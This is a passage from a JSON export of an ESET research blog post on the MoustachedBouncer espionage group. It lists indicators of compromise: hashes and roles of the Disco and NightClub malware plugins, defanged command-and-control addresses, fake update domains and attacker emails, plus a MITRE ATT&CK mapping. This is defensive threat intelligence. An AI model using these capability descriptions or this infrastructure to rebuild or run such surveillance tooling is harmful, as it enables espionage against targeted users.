plugin. 
Takes screenshots.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C2AA90B441391ADEFAA3A841AA8CE777D6EC7E18<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">officetelemetry.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Agent.BT<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Reverse proxy based on revsocks. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C5B2323EAE5E01A6019931CE35FF7623DF7346BA<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">oracleTelemetry.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin packed with Themida. Takes screenshots. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">C46CB98D0CECCB83EC7DE070B3FA7AFEE7F41189<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">outlooksync.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">WinGo\/Spy.Agent.W<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco plugin. Takes screenshots. 
<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">A3AE82B19FEE2756D6354E85A094F1A4598314AB<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">kb4480959_EdgeUpdate.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">MSIL\/TrojanDropper.Agent.FKQ<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Disco .NET dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">4F1CECF6D05571AE35ED00AC02D5E8E0F878A984<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">WinSrcNT.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. Steals recent files. <\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0DAEA89F91A55F46D33C294CFE84EF06CE22E393<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">It11.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. Steals recent files.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">11CF38D971534D9B619581CEDC19319962F3B996<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">It3.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin used by Disco. 
Makes raw dumps of removable drives.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">F92FE4DD679903F75ADE64DC8A20D46DFBD3B277<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">metamn.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub (2017 version).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6999730D0715606D14ACD19329AF0685B8AD0299<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">et2z7q0FREZ.cr<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.B<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin. Keylogger.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">6E729E84C7672F048ED8AE847F20A0219E917FA3<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sTUlsWa1.cr<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win64\/Nightclub.A<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub plugin.<span><br \/>\n<\/span>File stealer.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">0401EE7F3BC384734BF7E352C4C4BC372840C30D<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">EsetUpdate-0117583943.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub dropper.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">5B55250CC0DA407201B5F042322CFDBF56041632<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">creh.dll<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span 
lang=\"EN-US\">Win32\/Nightclub.C<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">NightClub (2014).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">D14D9118335C9BF6633CB2A41023486DACBEB052<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">svhvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Orchestrator (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">E6DE72516C1D4338D7E45E028340B54DCDC7A8AC<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">schvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Module agent (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">3AD77281640E7BA754E9B203C8B6ABFD3F6A7BDD<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">nullnat.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Backdoor with DNS tunneling (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">142FF0770BC6E3D077FBB64D6F23499D9DEB9093<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">soccix.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Keylogger (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">FE9527277C06D7F986161291CE7854EE79788CB8<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span 
lang=\"EN-US\">oreonion.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Screenshotter (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">92115E21E565440B1A26ECC20D2552A214155669<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">svhvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Orchestrator (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">DE0B38E12C0AF0FD63A67B03DD1F8C1BF7FA6128<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">schvost.exe<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Module agent (NightClub).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">D2B715A72BBA307CC9BF7690439D34F62EDF1324<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">sysleg.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Records audio (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"155\">\n<p><strong><span lang=\"EN-US\">DF8DED42F9B7DE1F439AEC50F9C2A13CD5EB1DB6<\/span><\/strong><\/p>\n<\/td>\n<td width=\"155\">\n<p><span><span lang=\"EN-US\">oreonion.ini<\/span><\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Win32\/Nightclub.D<\/span><\/p>\n<\/td>\n<td width=\"155\">\n<p><span lang=\"EN-US\">Takes screenshots (NightClub plugin).<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>C&amp;C servers<\/h3>\n<\/p>\n<table border=\"1\" cellpadding=\"0\" 
cellspacing=\"0\">\n<tbody>\n<tr>\n<td width=\"153\">\n<p><strong><span lang=\"EN-US\">IP<\/span><\/strong><\/p>\n<\/td>\n<td width=\"182\">\n<p><strong><span lang=\"EN-US\">Domain<\/span><\/strong><\/p>\n<\/td>\n<td width=\"141\">\n<p><strong><span lang=\"EN-US\">First seen<\/span><\/strong><\/p>\n<\/td>\n<td width=\"144\">\n<p><strong><span lang=\"EN-US\">Comment<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">185.87.148[.]86<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">centrocspupdate[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">November 3, 2021<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">185.87.151[.]130<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">ocsp-atomsecure[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">November 11, 2021<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">45.136.199[.]67<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">securityocspdev[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">July 5, 2022<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"153\">\n<p><span><strong><span lang=\"EN-US\">45.136.199[.]129<\/span><\/strong><\/span><\/p>\n<\/td>\n<td width=\"182\">\n<p><span><span lang=\"EN-US\">dervasopssec[.]com<\/span><\/span><\/p>\n<\/td>\n<td width=\"141\">\n<p><span lang=\"EN-US\">October 12, 2022<\/span><\/p>\n<\/td>\n<td width=\"144\">\n<p><span lang=\"EN-US\">Suspected 
NightClub C&amp;C server.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>\u201cFake\u201d domains used in AitM<\/h3>\n<p>Note: These domains are used in a context where DNS queries are intercepted before reaching the internet. They do not resolve outside the context of the AitM attack.<\/p>\n<p><span>windows.network.troubleshooter[.]com<\/span><\/p>\n<p><span>updates.microsoft[.]com<\/span><\/p>\n<h3>SMB share IP addresses while AitM is ongoing<\/h3>\n<p>Note: These IP addresses are used in a context where traffic to them is intercepted before reaching the internet. These internet-routable IP addresses are not malicious outside the context of the AitM attack.<\/p>\n<p><span>24.9.51[.]94<\/span><\/p>\n<p><span>35.214.56[.]2<\/span><\/p>\n<p><span>38.9.8[.]78<\/span><\/p>\n<p><span>52.3.8[.]25<\/span><\/p>\n<p><span>59.6.8[.]25<\/span><\/p>\n<p><span>209.19.37[.]184<\/span><\/p>\n<h3>Email addresses<\/h3>\n<p><span>fhtgbbwi@mail[.]ru<\/span><\/p>\n<p><span>nvjfnvjfnjf@mail[.]ru<\/span><\/p>\n<p><span>glen.morriss75@seznam[.]cz<\/span><\/p>\n<p><span>SunyaF@seznam[.]cz<\/span><\/p>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\"><em>version 13<\/em><\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<table border=\"1\" cellpadding=\"0\" cellspacing=\"0\" width=\"643\">\n<thead>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Tactic<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">ID<\/span><\/strong><\/p>\n<\/td>\n<td width=\"151\">\n<p><strong><span lang=\"EN-US\">Name<\/span><\/strong><\/p>\n<\/td>\n<td width=\"265\">\n<p><strong><span lang=\"EN-US\">Description<\/span><\/strong><\/p>\n<\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Reconnaissance<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a 
href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1590\/005\"><em>T1590.005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Gather Victim Network Information: IP Addresses<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer operators have collected IP addresses, or address blocks, of their targets in order to modify network traffic for just those addresses.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Initial Access<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1189\"><em>T1189<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Drive-by Compromise<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco is delivered via a fake Windows Update website.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Execution<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1204\/002\"><em>T1204.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">User Execution: Malicious File<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco needs to be manually executed by the victim.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Persistence<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1053\/005\"><em>T1053.005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Scheduled Task\/Job: Scheduled Task<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco persists as a scheduled task that downloads an executable from a \u201cfake\u201d SMB share every 
minute.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1543\/003\"><em>T1543.003<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Create or Modify System Process: Windows Service<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub persists as a <\/span><span><span lang=\"EN-US\">ServiceDll<\/span><\/span><span lang=\"EN-US\"> of a service named <\/span><span><span lang=\"EN-US\">WmdmPmSp<\/span><\/span><span lang=\"EN-US\">.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Privilege Escalation<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1068\"><em>T1068<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Exploitation for Privilege Escalation<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Disco has a plugin to exploit the CVE-2021-1732 local privilege escalation vulnerability.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Defense Evasion<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1140\/\"><em><span>T1140<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Deobfuscate\/Decode Files or Information<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">Since 2020, NightClub has used an external configuration file encrypted with RSA.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"5\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Collection<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1005\"><em>T1005<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span 
lang=\"EN-US\">Data from Local System<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub steals recent files from the local system.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1025\"><em>T1025<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data from Removable Media<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub steals files from the local system.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1056\/001\"><em>T1056.001<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Input Capture: Keylogging<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub has a plugin to record keystrokes.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1113\"><em>T1113<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Screen Capture<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub and Disco each have a plugin to take screenshots.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1123\/\"><em><span>T1123<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Audio Capture<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub has a plugin to record audio.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"7\" width=\"113\">\n<p><strong><span lang=\"EN-US\">Command and Control<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a 
href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/002\"><em>T1071.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: File Transfer Protocols<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"PT-BR\">Disco communicates via the SMB protocol.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/003\"><em>T1071.003<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: Mail Protocols<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub communicates via the SMTP protocol.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1071\/004\/\"><em><span>T1071.004<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Application Layer Protocol: DNS<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">One of the NightClub plugins is a backdoor that communicates via DNS.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1132\/001\"><em>T1132.001<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Encoding: Standard Encoding<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub encodes files, attached to email, in base64.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1132\/002\"><em>T1132.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Encoding: Non-Standard Encoding<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub encodes commands and responses sent via its DNS C&amp;C channel with a 
modified form of base64.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1573\/001\/\"><em><span>T1573.001<\/span><\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Encrypted Channel: Symmetric Cryptography<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub receives plugins in email attachments, encrypted using AES-CBC.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1557\"><em>T1557<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Adversary-in-the-Middle<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer has performed AitM at the ISP level to redirect its targets to a fake Windows Update page. It has also done AitM on the SMB protocol to deliver malicious files from \u201cfake\u201d servers.<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Exfiltration<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1041\"><em>T1041<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Exfiltration Over C2 Channel<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">NightClub and Disco exfiltrate data over the C&amp;C channel (SMTP, SMB, and DNS).<\/span><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td width=\"113\">\n<p><strong><span lang=\"EN-US\">Impact<\/span><\/strong><\/p>\n<\/td>\n<td width=\"113\">\n<p><span lang=\"EN-US\"><a href=\"https:\/\/attack.mitre.org\/versions\/v13\/techniques\/T1565\/002\"><em>T1565.002<\/em><\/a><\/span><\/p>\n<\/td>\n<td width=\"151\">\n<p><span lang=\"EN-US\">Data Manipulation: Transmitted Data Manipulation<\/span><\/p>\n<\/td>\n<td width=\"265\">\n<p><span lang=\"EN-US\">MoustachedBouncer 
has modified the HTTP traffic from specific IP addresses at the ISP level in order to redirect its targets to a fake Windows Update page.<\/span><\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p class=\"wls-source\"><a href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/moustachedbouncer-espionage-against-foreign-diplomats-in-belarus\/\" rel=\"nofollow noopener\" target=\"_blank\">Read the full analysis on WeLiveSecurity \u2192<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Long-term espionage against diplomats, leveraging email-based C&#038;C protocols, C++ modular backdoors, and adversary-in-the-middle (AitM) attacks\u2026 Sounds like the infamous Turla? 
Think again!<\/p>\n","protected":false},"author":5,"featured_media":8430,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[2878],"tags":[],"class_list":["post-8429","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-eset-research"],"acf":[],"amp_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8429","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/comments?post=8429"}],"version-history":[{"count":0,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/posts\/8429\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media\/8430"}],"wp:attachment":[{"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/media?parent=8429"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/categories?post=8429"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.eset.ee\/et\/en\/wp-json\/wp\/v2\/tags?post=8429"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}